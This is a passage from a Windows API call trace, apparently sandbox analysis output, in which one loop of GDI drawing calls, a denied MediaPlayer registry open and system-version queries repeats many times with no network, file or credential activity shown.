wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.459] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.459] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.459] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.459] BeginPath (hdc=0x0) returned 0 [0017.460] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.460] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.460] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.460] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.460] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.460] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.460] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.460] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.460] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xca040713 [0017.460] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc004027d [0017.460] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040916 [0017.460] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040917 [0017.460] CombineRgn (hrgnDst=0x1040916, hrgnSrc1=0xca040713, hrgnSrc2=0xc004027d, iMode=1) returned 1 [0017.460] CombineRgn (hrgnDst=0x1040917, hrgnSrc1=0xca040713, hrgnSrc2=0xc004027d, iMode=4) returned 2 [0017.460] CreateSolidBrush (color=0xff) returned 0x2100915 [0017.460] CreateSolidBrush (color=0xff0000) returned 0x1100918 [0017.460] DeleteObject (ho=0x1100918) returned 1 [0017.460] DeleteObject (ho=0xc004027d) returned 1 [0017.460] DeleteObject (ho=0xca040713) returned 1 [0017.460] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.460] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.460] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.460] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.460] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.460] BeginPath (hdc=0x0) returned 0 [0017.460] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.460] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.460] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.460] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.460] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.460] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.461] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.461] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.461] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc104027d [0017.461] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcb040713 [0017.461] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040919 [0017.461] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104091a [0017.461] CombineRgn (hrgnDst=0x1040919, hrgnSrc1=0xc104027d, hrgnSrc2=0xcb040713, iMode=1) returned 1 [0017.461] CombineRgn (hrgnDst=0x104091a, hrgnSrc1=0xc104027d, hrgnSrc2=0xcb040713, iMode=4) returned 2 [0017.461] CreateSolidBrush (color=0xff) returned 0x2100918 [0017.461] CreateSolidBrush (color=0xff0000) returned 0x110091b [0017.461] DeleteObject (ho=0x110091b) returned 1 [0017.461] DeleteObject (ho=0xcb040713) returned 1 [0017.461] DeleteObject (ho=0xc104027d) returned 1 [0017.461] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.461] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.461] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.461] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.461] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.461] BeginPath (hdc=0x0) returned 0 [0017.461] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.461] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.461] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.461] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.461] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.461] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.461] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.461] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.462] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcc040713 [0017.462] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc204027d [0017.462] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104091c [0017.462] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104091d [0017.462] CombineRgn (hrgnDst=0x104091c, hrgnSrc1=0xcc040713, hrgnSrc2=0xc204027d, iMode=1) returned 1 [0017.462] CombineRgn (hrgnDst=0x104091d, hrgnSrc1=0xcc040713, hrgnSrc2=0xc204027d, iMode=4) returned 2 [0017.462] CreateSolidBrush (color=0xff) returned 0x210091b [0017.462] CreateSolidBrush (color=0xff0000) returned 0x110091e [0017.462] DeleteObject (ho=0x110091e) returned 1 [0017.462] DeleteObject (ho=0xc204027d) returned 1 [0017.462] DeleteObject (ho=0xcc040713) returned 1 [0017.462] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.462] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.462] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.462] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.462] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.462] BeginPath (hdc=0x0) returned 0 [0017.462] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.462] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.462] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.462] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.462] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.462] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.462] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.462] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.462] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc304027d [0017.462] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcd040713 [0017.462] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104091f [0017.462] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040920 [0017.462] CombineRgn (hrgnDst=0x104091f, hrgnSrc1=0xc304027d, hrgnSrc2=0xcd040713, iMode=1) returned 1 [0017.463] CombineRgn (hrgnDst=0x1040920, hrgnSrc1=0xc304027d, hrgnSrc2=0xcd040713, iMode=4) returned 2 [0017.463] CreateSolidBrush (color=0xff) returned 0x210091e [0017.463] CreateSolidBrush (color=0xff0000) returned 0x1100921 [0017.463] DeleteObject (ho=0x1100921) returned 1 [0017.463] DeleteObject (ho=0xcd040713) returned 1 [0017.463] DeleteObject (ho=0xc304027d) returned 1 [0017.463] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.463] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.463] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.463] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.463] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.463] BeginPath (hdc=0x0) returned 0 [0017.463] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.463] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.463] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.463] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.463] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.463] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.463] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.463] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.463] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xce040713 [0017.463] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc404027d [0017.463] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040922 [0017.463] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040923 [0017.463] CombineRgn (hrgnDst=0x1040922, hrgnSrc1=0xce040713, hrgnSrc2=0xc404027d, iMode=1) returned 1 [0017.463] CombineRgn (hrgnDst=0x1040923, hrgnSrc1=0xce040713, hrgnSrc2=0xc404027d, iMode=4) returned 2 [0017.463] CreateSolidBrush (color=0xff) returned 0x2100921 [0017.463] CreateSolidBrush (color=0xff0000) returned 0x1100924 [0017.463] DeleteObject (ho=0x1100924) returned 1 [0017.464] DeleteObject (ho=0xc404027d) returned 1 [0017.464] DeleteObject (ho=0xce040713) returned 1 [0017.464] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.464] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.464] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.464] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.464] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.464] BeginPath (hdc=0x0) returned 0 [0017.464] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.464] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.464] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.464] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.464] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.464] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.464] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.464] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.464] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc504027d [0017.464] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcf040713 [0017.464] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040925 [0017.464] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040926 [0017.464] CombineRgn (hrgnDst=0x1040925, hrgnSrc1=0xc504027d, hrgnSrc2=0xcf040713, iMode=1) returned 1 [0017.464] CombineRgn (hrgnDst=0x1040926, hrgnSrc1=0xc504027d, hrgnSrc2=0xcf040713, iMode=4) returned 2 [0017.464] CreateSolidBrush (color=0xff) returned 0x2100924 [0017.464] CreateSolidBrush (color=0xff0000) returned 0x1100927 [0017.464] DeleteObject (ho=0x1100927) returned 1 [0017.464] DeleteObject (ho=0xcf040713) returned 1 [0017.464] DeleteObject (ho=0xc504027d) returned 1 [0017.464] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.464] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.465] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.465] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.465] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.465] BeginPath (hdc=0x0) returned 0 [0017.465] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.465] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.465] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.465] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.465] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.465] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.467] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.467] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.468] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd0040713 [0017.468] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc604027d [0017.468] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040928 [0017.468] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040929 [0017.468] CombineRgn (hrgnDst=0x1040928, hrgnSrc1=0xd0040713, hrgnSrc2=0xc604027d, iMode=1) returned 1 [0017.468] CombineRgn (hrgnDst=0x1040929, hrgnSrc1=0xd0040713, hrgnSrc2=0xc604027d, iMode=4) returned 2 [0017.468] CreateSolidBrush (color=0xff) returned 0x2100927 [0017.468] CreateSolidBrush (color=0xff0000) returned 0x110092a [0017.468] DeleteObject (ho=0x110092a) returned 1 [0017.468] DeleteObject (ho=0xc604027d) returned 1 [0017.468] DeleteObject (ho=0xd0040713) returned 1 [0017.468] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.468] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.468] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.468] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.468] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.468] BeginPath (hdc=0x0) returned 0 [0017.468] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.468] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.468] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.468] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.468] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.468] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.468] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.468] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.468] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc704027d [0017.468] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd1040713 [0017.468] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104092b [0017.468] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104092c [0017.468] CombineRgn (hrgnDst=0x104092b, hrgnSrc1=0xc704027d, hrgnSrc2=0xd1040713, iMode=1) returned 1 [0017.469] CombineRgn (hrgnDst=0x104092c, hrgnSrc1=0xc704027d, hrgnSrc2=0xd1040713, iMode=4) returned 2 [0017.469] CreateSolidBrush (color=0xff) returned 0x210092a [0017.469] CreateSolidBrush (color=0xff0000) returned 0x110092d [0017.469] DeleteObject (ho=0x110092d) returned 1 [0017.469] DeleteObject (ho=0xd1040713) returned 1 [0017.469] DeleteObject (ho=0xc704027d) returned 1 [0017.469] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.469] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.469] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.469] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.469] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.469] BeginPath (hdc=0x0) returned 0 [0017.469] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.469] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.469] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.469] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.469] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.469] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.469] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.469] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.469] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd2040713 [0017.469] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc804027d [0017.469] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104092e [0017.469] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104092f [0017.469] CombineRgn (hrgnDst=0x104092e, hrgnSrc1=0xd2040713, hrgnSrc2=0xc804027d, iMode=1) returned 1 [0017.469] CombineRgn (hrgnDst=0x104092f, hrgnSrc1=0xd2040713, hrgnSrc2=0xc804027d, iMode=4) returned 2 [0017.469] CreateSolidBrush (color=0xff) returned 0x210092d [0017.469] CreateSolidBrush (color=0xff0000) returned 0x1100930 [0017.469] DeleteObject (ho=0x1100930) returned 1 [0017.469] DeleteObject (ho=0xc804027d) returned 1 [0017.469] DeleteObject (ho=0xd2040713) returned 1 [0017.470] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.470] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.470] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.470] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.470] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.470] BeginPath (hdc=0x0) returned 0 [0017.470] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.470] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.470] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.470] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.470] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.470] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.470] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, 